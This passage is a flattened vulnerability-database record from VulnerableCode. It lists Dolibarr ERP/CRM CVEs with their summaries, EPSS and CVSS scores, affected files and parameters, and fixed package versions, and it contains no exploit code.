0.82838 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.01735 |
| scoring_system |
epss |
| scoring_elements |
0.82839 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0819 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@15.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@15.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 3 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 4 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 5 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 6 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 7 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 8 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 9 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 10 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 11 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 12 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 13 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 14 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 15 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 16 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 17 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 18 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 19 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 20 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 21 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 22 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.1 |
|
|
| aliases |
CVE-2022-0819, GHSA-42qm-c3cf-9wv2
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-7qjh-teat-tqav |
|
| 20 |
| url |
VCID-7txt-x88q-2bej |
| vulnerability_id |
VCID-7txt-x88q-2bej |
| summary |
Dolibarr vulnerable to SQL Injection
Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters in /dolibarr/commande/list.php. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 11 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 12 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 13 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 14 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 27 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 28 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 29 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 30 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 31 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 32 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 33 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 34 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 35 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 36 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 37 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 38 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 39 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 40 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 41 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 42 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 43 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 44 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 45 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2 |
|
|
| aliases |
CVE-2024-5315, GHSA-q8x7-jc3h-p8xc
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-7txt-x88q-2bej |
|
| 21 |
| url |
VCID-8fjr-6hdm-vqdd |
| vulnerability_id |
VCID-8fjr-6hdm-vqdd |
| summary |
Dolibarr user with permission to edit PHP content can bypass filtering to restrict dangerous PHP functions
In the Website module of Dolibarr ERP & CRM 22.0.4 and below, the application uses blacklist-based filtering to restrict dangerous PHP functions related to system command execution. An authenticated user with permission to edit PHP content can bypass this filtering, resulting in full remote code execution with the ability to execute arbitrary operating system commands on the server. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T18:23:29Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2026-31019, GHSA-j2g9-rprv-hrhc
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-8fjr-6hdm-vqdd |
|
| 22 |
| url |
VCID-9xkp-4t9p-eqbb |
| vulnerability_id |
VCID-9xkp-4t9p-eqbb |
| summary |
Cross-site Scripting
An issue was discovered in Dolibarr There is Stored XSS in `expensereport/card.php` in the expense reports plugin via the `comments` parameter, or a public or private note. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2018-16808 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00199 |
| scoring_system |
epss |
| scoring_elements |
0.419 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00199 |
| scoring_system |
epss |
| scoring_elements |
0.41957 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00199 |
| scoring_system |
epss |
| scoring_elements |
0.41986 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00199 |
| scoring_system |
epss |
| scoring_elements |
0.41976 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2018-16808 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 26 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 27 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 28 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 29 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 30 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 31 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 32 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 33 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 34 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 35 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 36 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 37 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 38 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 39 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 40 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 41 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 42 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 43 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 44 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 45 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 46 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 47 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 48 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 49 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 50 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 51 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 52 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 53 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 54 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 55 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1 |
|
|
| aliases |
CVE-2018-16808, GHSA-r3r5-fqfm-9wrh
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-9xkp-4t9p-eqbb |
|
| 23 |
| url |
VCID-b65k-vs97-63fj |
| vulnerability_id |
VCID-b65k-vs97-63fj |
| summary |
Cross-site Scripting
Dolibarr is vulnerable to XSS in `/exports/export.php`. |
| references |
| 0 |
|
| 1 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2018-19799 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.0218 |
| scoring_system |
epss |
| scoring_elements |
0.84684 |
| published_at |
2026-06-07T12:55:00Z |
|
| 1 |
| value |
0.0218 |
| scoring_system |
epss |
| scoring_elements |
0.84661 |
| published_at |
2026-06-04T12:55:00Z |
|
| 2 |
| value |
0.0218 |
| scoring_system |
epss |
| scoring_elements |
0.84685 |
| published_at |
2026-06-05T12:55:00Z |
|
| 3 |
| value |
0.0218 |
| scoring_system |
epss |
| scoring_elements |
0.84689 |
| published_at |
2026-06-06T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2018-19799 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@8.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@8.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 21 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 22 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 23 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 24 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 25 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 26 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 27 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 28 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 29 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 30 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 31 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 32 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 33 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 34 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 35 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 36 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 37 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 38 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 39 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 40 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 41 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 42 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 43 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 44 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 45 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 46 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 47 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 48 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 49 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 50 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@8.0.4 |
|
|
| aliases |
CVE-2018-19799, GHSA-ggww-q2gv-m3g4
|
| risk_score |
10.0 |
| exploitability |
2.0 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-b65k-vs97-63fj |
|
| 24 |
| url |
VCID-d4uk-4adf-mba9 |
| vulnerability_id |
VCID-d4uk-4adf-mba9 |
| summary |
Dolibarr Improper Input Validation vulnerability
Improper Access Control in Dolibarr ERP CRM <= v17.0.3 allows an unauthorized authenticated user to read a database table containing customer data |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2023-4198, GHSA-48v2-596x-4jr9
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-d4uk-4adf-mba9 |
|
| 25 |
| url |
VCID-dph7-h5d5-gyct |
| vulnerability_id |
VCID-dph7-h5d5-gyct |
| summary |
Improper Authentication
Admin level users can change other user's details but fails to validate already existing `Login` name, while renaming the user “Login”. This leads to complete account takeover of the victim user. This happens since the password gets overwritten for the victim user having a similar login name. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25956 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00372 |
| scoring_system |
epss |
| scoring_elements |
0.59262 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00372 |
| scoring_system |
epss |
| scoring_elements |
0.59307 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00372 |
| scoring_system |
epss |
| scoring_elements |
0.59315 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00372 |
| scoring_system |
epss |
| scoring_elements |
0.59312 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25956 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@13.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@13.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 9 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 10 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 11 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 12 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 13 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 14 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 15 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 16 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 17 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 18 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 19 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 20 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 21 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 22 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 23 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 24 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 25 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 26 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 27 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 28 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 29 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 30 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 31 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 32 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 33 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 7 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 8 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 9 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 10 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 11 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 12 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 13 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 14 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 15 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 16 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 17 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 18 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 19 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 20 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 21 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 22 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 23 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 24 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 25 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 26 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 27 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 28 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 29 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 30 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 31 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 32 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0 |
|
|
| aliases |
CVE-2021-25956, GHSA-fjqg-w8g6-hhq8
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-dph7-h5d5-gyct |
|
| 26 |
| url |
VCID-e39t-gvd4-j7ag |
| vulnerability_id |
VCID-e39t-gvd4-j7ag |
| summary |
SQL Injection
Dolibarr ERP/CRM allows XSS via the `qty` parameter to `product/fournisseurs.php` (product price screen). |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2019-19212 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.01154 |
| scoring_system |
epss |
| scoring_elements |
0.78865 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.01154 |
| scoring_system |
epss |
| scoring_elements |
0.78889 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.01154 |
| scoring_system |
epss |
| scoring_elements |
0.78899 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.01154 |
| scoring_system |
epss |
| scoring_elements |
0.78892 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2019-19212 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@10.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@10.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 15 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 16 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 17 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 18 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 19 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 20 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 21 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 22 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 23 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 24 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 25 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 26 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 27 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 28 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 29 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 30 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 31 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 32 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 33 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 34 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 35 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 36 |
| vulnerability |
